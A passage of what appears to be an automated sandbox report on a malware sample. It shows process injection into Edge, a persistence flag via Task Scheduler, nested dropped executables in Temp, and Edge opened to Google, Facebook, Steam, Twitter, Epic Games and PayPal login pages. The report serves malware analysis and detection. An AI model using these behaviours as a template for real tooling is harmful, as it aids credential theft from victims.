PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3528 wrote to memory of 1392 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe

"C:\Users\Admin\AppData\Local\Temp\2a514d14cf0c18516696437e608ab3e2.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\fp8nT60.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EX1WW49.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Vw0sh07.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vo97PU2.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12817497746540180914,17803094425432372633,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,15683247929074773971,137571882435910043,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,15683247929074773971,137571882435910043,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2184513226323836926,18337166209451837570,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2184513226323836926,18337166209451837570,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,12817497746540180914,17803094425432372633,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,6612052458489063345,8070063193370144605,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,10912680623660141788,673443190448807748,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4560 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,10887465860726572600,513329467361060850,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff82f1c46f8,0x7ff82f1c4708,0x7ff82f1c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2wP3939.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7184 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7184 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7ze53RP.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 7204 -ip 7204

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ki226gq.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6572 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9BC6lJ8.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2228,5791537382129674403,10315984867886908461,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=320 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\D50E.exe

C:\Users\Admin\AppData\Local\Temp\D50E.exe

C:\Users\Admin\AppData\Local\Temp\D667.exe

C:\Users\Admin\AppData\Local\Temp\D667.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8072 -ip 8072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 784

C:\Users\Admin\AppData\Local\Temp\392.exe

C:\Users\Admin\AppData\Local\Temp\392.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

C:\Users\Admin\AppData\Local\Temp\970.exe

C:\Users\Admin\AppData\Local\Temp\970.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\6C0.exe

